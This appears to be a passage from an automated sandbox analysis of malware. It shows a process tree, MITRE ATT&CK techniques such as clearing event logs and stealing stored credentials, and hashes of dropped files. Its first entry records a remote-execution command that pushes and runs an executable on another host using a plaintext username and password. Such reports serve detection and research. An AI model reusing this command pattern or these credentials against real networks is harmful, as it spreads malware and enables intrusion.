C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.0.1 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:1916
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1500
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1384
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Direct Volume Access
1Indicator Removal
4Clear Windows Event Logs
1File Deletion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
331KB
MD527304b246c7d5b4e149124d5f93c5b01
SHA1e50d9e3bd91908e13a26b3e23edeaf577fb3a095
SHA2563337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
SHA512bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b
-
Filesize
36KB
MD53c0d740347b0362331c882c2dee96dbf
SHA18350e06f52e5c660bb416b03edb6a5ddc50c3a59
SHA256ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85
SHA512a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f
-
Filesize
277KB
MD586d1a184850859a6a4d1c35982f3c40e
SHA14abde6ff4d7f30c60dc61e866c4a11a7eee5bef5
SHA256eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f
SHA512e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a
-
Filesize
751KB
MD568970b2cd5430c812bef5b87c1add6ea
SHA17695d829965b802c50d96a19dbc2fc361169624d
SHA256e4e1e3c44e01c60fd433c6283bd8cd15a9941e1cbaad72e6409cc92e2e91263e
SHA5121ea13dfb60cdca0338bb20a50419901a12387db2253c5d6ae3b6939c803e6f1e7998b7ba443c7472a931e64df94521cb6c6c3f646b01d5e671acb103d0a64475